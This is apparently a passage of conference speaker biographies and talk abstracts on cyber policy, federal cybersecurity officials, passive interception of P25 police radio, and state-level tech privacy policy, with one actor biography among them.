Jon Iadonisi is the founder of White Canvas Group – a company that specializes in cultivating alternative and disruptive strategies. His depth of experience, diversified expertise, and unique operational background has provided a perspective that has enabled him to contribute to solving national security problems. He has spent the past fifteen years using innovative computing technologies coupled with cutting edge scholarship to solve complex problems, some of which later became implemented as new strategies and capabilities for the U.S. Government. He is regularly sought by the Department of Defense, various Intelligence agencies, and members of the US Congress to provide expert opinion and briefings on information age unconventional warfare. Prior to joining the private sector, Jon served as a Navy SEAL, where he designed, planned and led various combat operations that integrated innovative technologies and tactics into the operating environment, ultimately creating new capabilities for the Special Operations Community and Central Intelligence Agency. He is a combat-wounded and decorated veteran who earned a B.S. in Computer Science from the US Naval Academy, and M.S. in Homeland Security from San Diego State University. He is a member of the Council on Foreign Relations and guest lectures at San Diego State University and Georgetown Law School. He is an academic and athletic all American who participated in the 2000 Olympic Rifle team trials. He enjoys fine wine, good books, music, and outdoors activities.



Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized thought leader on cyber related issues. He provides an impressive professional network and is known for facilitating the establishment of programs and contracts. He has extensive leadership experience in formulating growth strategies, integrating policy, culture and training with technology issues, building relationships and delivering lasting results. He is also a strategic thinker who knows how to lead and very importantly, knows where to lead. He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration; and Supply Chain Risk Management programs.



Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National Cyber Security Initiative (CNCI).



In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director, Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing, coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.



From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr. Marshall provided advice and counsel on national security telecommunications and technology transfer policies and programs, national security telecommunications technical security programs, the National Information Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped bring focus on this issue at the national leadership level.



Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.



David McCallum: Born David Keith McCallum, Jr. in Glasgow, Scotland on Sept. 19, 1933, he was the son of David McCallum, Sr., the famed principal violinist for numerous orchestras in the United Kingdom, including the Royal Philharmonic Orchestra, and cellist Dorothy Dorman. After studying at the Royal Academy of Dramatic Arts, he made his debut in a 1946 BBC Radio production of "Whom the Gods Love, Die Young." Bit and supporting roles in British features and on television soon followed, often as troubled youth, befitting his brooding intensity. Among his more notable turns during this period was in 1958's "Violent Playground," where his psychotic gang member is spurred by poverty and rock and roll to take a classroom of school children hostage.



McCallum's American film debut came as the mother-fixated Carl von Schlosser in John Huston's "Freud" (1962), with Montgomery Clift as the pioneering analyst. The following year, he played Royal Navy Officer Ashley-Pitt, who devised the method of dispersing the dirt from tunnels dug under a POW camp in "The Great Escape" (1963). An early American television appearance on "The Outer Limits" (CBS, 1963-65) became one of his most enduring, thanks to the eye-popping makeup applied to McCallum. His character, a bitter Welsh miner, agreed to take part in an evolutionary experiment, which turned him into a hyper-intelligent mutant with a massive domed cranium. The image was memorable enough to make McCallum a go-to for numerous science fiction efforts in the ensuing decades.



In 1964, McCallum was cast as Illya Kuryakin, a minor character on the spy series "The Man from U.N.C.L.E." Despite having only two lines, the producers saw that McCallum and star Robert Vaughn had considerable chemistry together, and boosted the character to co-star status. The move changed McCallum's career forever. Kuryakin's cool demeanor, physical proficiency with any weapon, and passion for art, music and science - not to mention his wealth of blonde hair - made him an immediate favorite among female viewers, whose fan mail to the actor was the most ever received in the history of MGM, which produced the show. For the series' three years on the air, McCallum was at the apex of television stardom, and netted two Emmy nominations and a Golden Globe nod, as well as major roles in several films. He was the tormented Judas in George Stevens' epic Biblical drama "The Greatest Story Ever Told" (1965), and took the lead in a number of minor features, including 1968's "Sol Madrid" and "Mosquito Squadron" (1969), many of which traded on McCallum's popularity in "U.N.C.L.E." by casting him in action-oriented roles. During this period, McCallum also orchestrated and conducted a trio of lush, sonically adventurous records that put unique spins on some of the period's more popular songs.



In the 1970s, McCallum was a fixture on television in both America and England. In the States, he was a staple of science fiction and supernaturally-themed TV features, including "Hauser's Memory" (NBC, 1970), as a scientist who injected himself with a dying colleague's brain fluid to preserve defense secrets from foreign agents, while "She Waits" (CBS, 1972) cast him as the husband to a possessed Patty Duke. He also briefly returned to series work with "The Invisible Man" (NBC, 1975-76) as a scientist who used his invisibility formula to aid a government agency against evildoers. His work in England hewed more towards dramatic fare: in "Colditz" (BBC, 1972-74), he was an aggressive RAF officer who put aside his anger towards the Nazis to help organize an escape from a notorious German war prison, while in "Sapphire & Steel" (ITV, 1979-1982), he and Joanna Lumley played extraterrestrial operatives who investigated strange incidents involving the time-space continuum. In 1983, he reunited with Robert Vaughn for "The Return of the Man from U.N.C.L.E." (CBS), which saw Illya retired from espionage to design women's clothing in New York. The escape of a top enemy spy brings both U.N.C.L.E. men back into action, albeit with other, younger agents. The TV-movie was intended as the pilot for a new version of the series, but the show was never greenlit.



After logging time on countless, unmemorable series like "Team Knight Rider" (syndicated, 1997-98) and "The Education of Max Bickford" (CBS, 2001-02), McCallum found his next hit with "NCIS," a police procedural drama about Navy investigators. McCallum played Chief Medical Examiner Donald "Ducky" Mallard, an eccentric but highly efficient investigator with a knack for psychological profiling. A close confidante to Mark Harmon's Jethro Gibbs, he served as father confessor and paternal figure for the show's offbeat cast of characters. The show's slow-building popularity brought McCallum back to a television audience made up in part of the children of viewers who sent him fan letters back in the "U.N.C.L.E." days, granting him a rare burst of second stardom.



Justin Wykes joined the National White Collar Crime Center in December 2006 as a Computer Crime Specialist. He is currently responsible for the development and updating of the "Basic Cell Phone Investigations" course as well as instructing multiple basic and advanced level courses.



He has ten years' experience building, fixing and repairing computers, and earned his A+ certification in September of 2006. After earning a Bachelor of Science degree from Grand Valley State University in Criminal Justice, with an emphasis in Law Enforcement, Mr. Wykes spent five years as a Special Agent for US Army Counterintelligence. The last two of those years were spent as a computer forensic examiner for the Cyber Counterintelligence Activity. As a Special Agent for CCA, Mr. Wykes conducted multi-agency investigations into security compromises, espionage, and terrorism.






Meet the Feds 2 - Policy

Did you ever wonder if the Feds were telling you the truth when you asked a question? Join current and former federal agents from numerous agencies to discuss cyber policy and answer your burning questions. Enjoy the opportunity to grill ‘em and get down to the bottom of things!



Agencies that will have representatives include: Defense Cyber Crime Center (DC3), Department of Homeland Security (DHS), United States Computer Emergency Readiness Team (US CERT), Office of the Secretary of Defense Networks and Information Integration (OSD/NII), National Security Agency (NSA), National Defense University (NDU), and Virginia Tech.



Each of the agency reps will make an opening statement regarding their agency's role, and then open it up to the audience for questions.



Jim Christy is a retired special agent who has specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force Office of Special Investigations, with over 40 years of federal service. Jim returned to the federal government first as an IPA and now as an HQE and is the Director of Futures Exploration (FX) for the Department of Defense Cyber Crime Center (DC3). FX, the DC3 innovation incubator, is responsible for outreach/marketing and strategic relationships with other government organizations, the private sector, and academia for DC3. He was profiled in Wired Magazine in January 2007.



Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.



In May 2011, the Air Force graduated the first NCOs for a new AF career field, Cyber Defense Operations, at Keesler AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”. In 2006, Christy created the DC3 Digital Forensics Challenge, an international competition that in 2011 had 1,800 participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first venues to employ crowdsourcing in “real world” mission-focused solution development.



In Oct 2003, the Association of Information Technology Professionals named Jim the 2003 Distinguished Information Science Award winner for his outstanding contribution through distinguished services in the field of information management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot, General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.



From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3. As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for the Department of Defense.



Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level federal government agency entrusted with protecting the nation’s communication networks against cyber attack.



Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI). Prior to joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique in having experienced the inner workings of two, highly-charged, often competing, federal security agencies created in the wake of the September 11th attacks, an event that he says, “changed my life.”



Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues, as well as on organizational strategy and leadership. He is also an expert on how carbon markets and “green” issues affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his development of a new economic theory that provides an explicit model for valuing any network, answering a decades-old problem in economics.



Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations, a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the Spider has been translated into 16 foreign editions and is broadly quoted.



At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc. went public and was later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of directors and advisors. While at CATS, Rod helped advance the financial theory of “value at risk,” now used globally for all key banking risk management. Rod co-edited the first book to introduce “value at risk.” Rod also co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200 million. He has co-launched other collaborations, software, and internet service businesses as well. From 1999 to 2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit card transactions over the internet.



In 2003, Rod co-founded a global peace network of CEOs which initiated Track II diplomatic efforts between India and Pakistan. The group’s symbolic actions opened the borders to people and trade, and contributed to ending the most recent Indo-Pak conflict. It's one of several non-profit groups and initiatives Rod has started. He now serves on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful boards in the world, and Jamii Bora Trust, an innovative micro-lending group in Africa with more than 200,000 members.



He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the University of St. Gallen in Switzerland.





Jerry Dixon currently serves as Director of Analysis for Team Cymru and is the former Director of the National Cyber Security Division (NCSD) & US-CERT of the Department of Homeland Security. He continues to advise partners on national cyber-security threats, aids organizations in preparing for cyber-attacks, and assists with the development of cyber-security policies for organizations.



Mischel Kwon is an IT executive with more than 29 years of experience ranging from application design and development, network architecture and deployment, Information Assurance policy, audit and management, technical defensive security, large wireless system security, to building organizational and national level Computer Emergency/Incident Response/Readiness Teams.



Ms. Kwon currently serves as the President of Mischel Kwon Associates, a security consulting firm specializing in Technical Defensive Security, Security Operations and Information Assurance.



Most recently, as the Vice President of Public Sector Security for RSA Security, Ms. Kwon was responsible for leading RSA in assisting the public sector with security solutions, strategies, technologies and policy.



Ms. Kwon was named the Director for the United States Computer Emergency Readiness Team (US-CERT) in June 2008 where she spearheaded the organization responsible for analyzing and reducing cyber threats and vulnerabilities in federal networks, disseminating cyber threat warning information and coordinating national incident response activities.



Kwon brings a unique blend of hands-on experience, academic research and training, and a seasoned understanding of how to build operational organizations from inception. Among her successes at the United States Department of Justice (DOJ), where she was Deputy Director for IT Security Staff, she built and deployed the Justice Security Operations Center (JSOC) to monitor and defend the DOJ network against cyber threats.



Ms. Kwon holds a Master of Science in Computer Science and a graduate certificate in Computer Security and Information Assurance. In addition, she serves as an adjunct professor at George Washington University in Washington, DC, where Ms. Kwon also runs the GW Cyber Defense Lab.



Riley Repko remains committed to building the ‘knowledge-bridge’ between the innovator (the solver) and the requirement (the seeker). He has a long history of working with innovative small and medium sized companies and entrepreneurs, leveraging his know-how to drive business. A constant and responsive connector, he is most comfortable strategizing with key industry decision-makers at the highest levels of government, between leading-edge cyber solution providers, venture capitalists, the white-hat 'wizards' and the R&D community. Today, Riley serves as both a cyber-security consultant and a Senior Research Fellow in Cyber Security for Virginia Tech, and as an affiliated faculty member with the Ted and Karyn Hume Center for National Security and Technology. Prior to joining Virginia Tech, Mr. Repko served as the senior advisor for cyber operations for both the United States Air Force and the Office of the Undersecretary for Cyber Policy within the Department of Defense.



Dr. Linton Wells II is the Director of the Center for Technology and National Security Policy (CTNSP) at National Defense University (NDU). He is also a Distinguished Research Professor and serves as the Transformation Chair. Prior to coming to NDU he served in the Office of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the Under Secretary of Defense (Policy).



In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing on STAR-TIDES, a research project focusing on affordable, sustainable support to stressed populations and public-private interoperability.



Dr. Wells was born in Luanda, Angola, in 1946. He graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.



Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997, and co-edited Crosscutting Issues in International Transformation, published in 2009. His hobbies include history, the relationship between policy and technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for Distinguished Public Service.



Mark Weatherford is the Deputy Under Secretary for Cybersecurity for the National Protection and Programs Directorate (NPPD), a position that will allow DHS NPPD to create a safe, secure, and resilient cyberspace. Weatherford has a wealth of experience in information technology and cybersecurity at the Federal, State and private sector levels.



Weatherford was previously the Vice President and Chief Security Officer of the North American Electric Reliability Corporation (NERC) where he directed the cybersecurity and critical infrastructure protection program. Before NERC, Weatherford was with the State of California where he was appointed by Governor Arnold Schwarzenegger as the state’s first Chief Information Security Officer. Prior to California, he served as the first Chief Information Security Officer for the State of Colorado, where he was appointed by two successive governors. Previously, as a member of the Raytheon Company, he successfully built and directed the Navy/Marine Corps Intranet Security Operations Center (SOC) in San Diego, California, and also was part of a team conducting security certification and accreditation with the U.S. Missile Defense Agency. A former U.S. Navy Cryptologic Officer, Weatherford led the U.S. Navy’s Computer Network Defense operations and the Naval Computer Incident Response Team (NAVCIRT).



Weatherford earned a bachelor’s degree from the University of Arizona and a master’s degree from the Naval Postgraduate School. He also holds the Certified Information Systems Security Professional (CISSP) and Certified Information Security Manager (CISM) certifications. He was awarded SC Magazine’s prestigious “CSO of the Year” award for 2010 and named one of the 10 Most Influential People in Government Information Security for 2012 by GovInfo Security.



Marcus Sachs is a retired Army officer and was also a presidential appointee to the White House Office of Cyberspace Security in 2002-2003. While at the White House he authored parts of the National Strategy to Secure Cyberspace, and proposed the creation of what ultimately became the US-CERT at DHS.



During his Army career he was well known for tinkering with things technical and often found ways to circumvent traditional controls and constraints to achieve mission success. An avid ham radio operator, he was the custodian of two different MARS stations and helped with the engineering of large X.25 packet switching networks in the 1980s long before Netscape and the Internet came along. In 1994 he became known as the Voodoo Switchdoctor thanks to his expertise in building and running secure data networks in Haiti that supported military operations there. In 1998 he was selected by the SECDEF to be an initial member of the DoD's Joint Task Force for Computer Network Operations, where he served until he retired at the end of 2001. At the JTF he spent time chasing malicious actors at all levels, from script-kiddie hackers to terrorists to nation states that were attempting to do harm to DoD networks. After leaving government in 2003 he volunteered as the director of the SANS Internet Storm Center for seven years and became well known at Defcon for sporting his motorcycle leather in the Las Vegas heat.



Currently at Verizon, Marcus now serves on several public-private working groups in the Washington D.C. area and is a frequent speaker at both technical as well as policy centric events and workshops. He holds degrees in Civil Engineering, Computer Science, and Science and Technology Commercialization, and is currently pursuing a Ph.D. in Public Policy. He authored and teaches a three-day course in Critical Infrastructure Protection at the SANS Institute and is a licensed Professional Engineer in the Commonwealth of Virginia.



Mr. Rob Joyce is the Deputy Director of the Information Assurance Directorate (IAD) at the National Security Agency. His organization is the NSA mission element charged with providing products and services critical to protecting our Nation’s systems that carry classified communications, military command and control or intelligence information. IAD provides technical expertise on cyber technologies, cryptography, security architectures and other issues related to information assurance, as well as supplying deep understanding of the vulnerability and threats to national security systems.



Mr. Joyce has spent more than 23 years at NSA, beginning his career as an engineer. He holds a Bachelor's Degree in Electrical and Computer Engineering from Clarkson University and a Master's Degree in Electrical Engineering from Johns Hopkins. Throughout his career with NSA, he has been the recipient of two Presidential Rank Awards, one meritorious and one at the distinguished level.






SIGINT and Traffic Analysis for the Rest of Us

Last year, we discovered practical protocol weaknesses in P25, a "secure" two-way radio system used by, among others, the federal government to manage surveillance and other sensitive law enforcement and intelligence operations. Although some of the problems are quite serious (efficient jamming, cryptographic failures, vulnerability to active tracking of idle radios, etc), many of these vulnerabilities require an active attacker who is able and willing to risk transmitting. So we also examined passive attacks, where all the attacker needs to do is listen, exploiting usability and key management errors when they occur. And we built a multi-city networked P25 interception infrastructure to see how badly the P25 security protocols do in practice (spoiler: badly).



This talk will describe the P25 protocols and how they failed, but will focus on the architecture and implementation of our interception network. We used off-the-shelf receivers with some custom software deployed around various US cities, capturing virtually every sensitive, but unintentionally clear transmission (and associated metadata) sent by federal agents in those cities. And by systematically analyzing the captured data, we often found that the whole was much more revealing than the sum of the parts. Come learn how to set up your own listening-post.



Sandy 'Mouse' Clark has been taking things apart since the age of two, and still hasn't learned to put them back together. An active member of the Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for NASA and singing at Carnegie Hall, and a minor in history. She is (still) at the University of Pennsylvania. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that involves night vision goggles. Her research explores human scale security, modeling the attacker/defender ecosystem and the unexpected ways that systems interact.

Twitter: @sa3nder

Google Plus: Sandy_Clark



Matt Blaze directs the Distributed Systems Lab at the University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.

Twitter: @mattblaze

http://www.crypto.com


Bad (and Sometimes Good) Tech Policy: It's Not Just a DC Thing

Efforts at the federal level to pass laws like SOPA and CISPA and to require that tech companies build backdoors into their services for law enforcement use have attracted widespread attention and criticism, and rightly so. But DC is far from the only place where officials are making decisions that impact the privacy and free speech rights of tech users. State and local officials are jumping into the fray as well, passing laws or creating policies that have immediate impact without the spotlight that accompanies federal action.



In this talk, I will survey several areas where state and local officials have recently been active, including warrantless location tracking, searches of student and employee devices and online accounts, automated license plate recognition, and DNA collection. I will highlight some of the best and worst policies coming from state and local officials. Most of all, I hope to convince you that keeping an eye on -- and even taking time to educate -- your local sheriff or state legislature may be just as important as protecting your freedoms at the national level.



Chris Conley is the Technology and Civil Liberties Policy Attorney at the ACLU of Northern California, where his mission is to ensure that emerging technology bolsters rather than erodes individual privacy and free speech rights. He takes a multidisciplinary approach to protecting civil liberties, from building apps and other tools that help users better understand and control the flow of their personal information to working on resources that help businesses build privacy and free speech protections into ne